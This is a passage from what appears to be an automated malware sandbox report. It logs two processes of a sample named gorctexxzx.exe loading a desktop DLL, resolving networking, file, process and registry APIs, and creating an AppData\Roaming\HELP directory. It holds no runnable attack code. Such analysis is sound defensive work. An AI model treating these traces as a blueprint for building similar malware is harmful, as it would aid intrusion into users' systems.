| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:26 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 96346 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #36: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #36 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllCanUnloadNow /fn_args="DefaultInstall" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:33, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:56 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc1c |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C20
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x0010ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0024ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000250000 | 0x00250000 | 0x00317fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0043ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x00540fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x005dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000005e0000 | 0x005e0000 | 0x007dffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:26 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 96424 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #37: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #37 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllGetClassObject /fn_args="DefaultInstall" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:33, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:56 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc28 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C2C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x00187fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x00190fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x002cffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000002d0000 | 0x002d0000 | 0x003d0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x0046ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000490000 | 0x00490000 | 0x0058ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000760000 | 0x00760000 | 0x0076ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000770000 | 0x00770000 | 0x0096ffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
